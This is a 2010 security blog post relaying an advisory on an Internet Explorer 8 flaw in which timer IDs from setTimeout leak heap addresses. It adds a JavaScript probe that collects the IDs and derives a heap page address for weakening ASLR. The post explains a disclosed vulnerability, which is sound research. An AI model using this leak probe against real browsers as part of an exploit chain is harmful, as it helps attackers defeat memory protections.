Wednesday, June 30, 2010

ZeroDay: Microsoft IE 'mshtml.dll' Remote Information Disclosure Vulnerability

Original Public Advisory
http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1

Sometimes, exploit writers would kill for a fixed address to pivot from. Nowadays, in the days of ASLR and DEP, any memory leak is welcome. Yesterday, Stefano Di Paola posted the following tweet http://twitter.com/WisecWisec/status/17254776077. After elaborating on that weird behaviour I discovered a flaw in mshtml.dll, exploitable via Internet Explorer. In VBScript/JScript there are at least two functions that make use of timers: setTimeout and setInterval. According to the documentation, the return value should be a Timer ID. In Chrome and FF [Firefox] this ID is purely sequential (1,2,3,4...), but in IE I was getting "weird" IDs. Later on I discovered that those IDs turned out to be a heap address plus a counter.

[...]

Products affected: Windows XP/Vista/7, 32- and 64-bit, with IE8. IE9 is not vulnerable.

----------------------------------------

In plain English: on IE8 any script can read a heap address out of a plain timer ID, which hands an exploit writer a known address to work from. That does not execute code on its own (it is an information disclosure), but chained with a memory-corruption bug it can be used to bypass ASLR, or at least to make it a much less effective protection layer.
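The following is an added example, not code from the advisory or from this post. It collects a run of timer IDs and decides whether they look like a plain counter (the Chrome/Firefox behaviour described above) or like a heap address plus a counter (the IE8 behaviour). The scheduler is passed in as a parameter so the analysis can be exercised offline with a fake scheduler; the starting value 0x02a3f001, the 0x10000 ceiling for a "small" counter, and the 4 KiB page mask are constructed assumptions for illustration, not values taken from the advisory.

```javascript
// Added example, not code from the advisory or the blog post.
// Probe what setTimeout returns and decide whether the IDs look like
// a plain counter (Chrome/Firefox) or like a heap address plus a counter
// (the IE8 behaviour the advisory describes).

// Schedule n harmless no-op timers far in the future and record the IDs.
// In a browser call this as collectTimerIds(window.setTimeout, 8).
// The scheduler is a parameter so the analysis can be exercised offline.
function collectTimerIds(schedule, n) {
  var ids = [];
  for (var i = 0; i < n; i++) {
    ids.push(Number(schedule(function () {}, 3600 * 1000)));
  }
  return ids;
}

// Unsigned hex rendering; IE may hand back the value as a signed 32-bit int.
function toHex(v) {
  return "0x" + (v >>> 0).toString(16);
}

// Classify a run of timer IDs.
//   kind: "sequential"    small integers increasing by one
//         "address-like"  increasing by one but starting at a large value
//         "other"         neither (e.g. random or reused IDs)
// For "address-like" IDs, pageHint is the first ID with its low 12 bits
// cleared. Assumption: the counter component is small compared with a
// 4 KiB page, so the page-aligned value is a real heap page of the process.
function analyzeTimerIds(ids) {
  if (ids.length < 2) throw new Error("need at least two timer IDs");
  var deltas = [];
  for (var i = 1; i < ids.length; i++) deltas.push(ids[i] - ids[i - 1]);
  var stepOne = deltas.every(function (d) { return d === 1; });
  var SMALL = 0x10000; // assumed ceiling for a plain per-document counter
  var result = { kind: "other", deltas: deltas, pageHint: null, pageHintHex: null };
  if (stepOne && ids[0] < SMALL) {
    result.kind = "sequential";
  } else if (stepOne) {
    result.kind = "address-like";
    result.pageHint = (ids[0] & ~0xfff) >>> 0;
    result.pageHintHex = toHex(result.pageHint);
  }
  return result;
}

// Offline demo with fake schedulers. The IDs are constructed for the
// demo, not real output captured from IE8 or Chrome.
function demo() {
  var next = 0x02a3f001;                        // constructed starting value
  var fakeIe8 = function () { return next++; }; // "address plus counter"
  var ieIds = collectTimerIds(fakeIe8, 4);
  var seq = 0;
  var fakeChrome = function () { return ++seq; }; // plain counter
  var chromeIds = collectTimerIds(fakeChrome, 4);
  return { ie: analyzeTimerIds(ieIds), chrome: analyzeTimerIds(chromeIds) };
}
```

To reproduce the advisory's observation in a real browser, call collectTimerIds(window.setTimeout, 8) in IE8 and again after reloading the page: a run that classifies as "address-like" and whose page hint lands in the process heap is the leak, and comparing it across loads shows how much of the heap layout ASLR is actually hiding from the script. The leak by itself only discloses an address; it still has to be paired with a separate memory-corruption bug to matter.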

More info here.
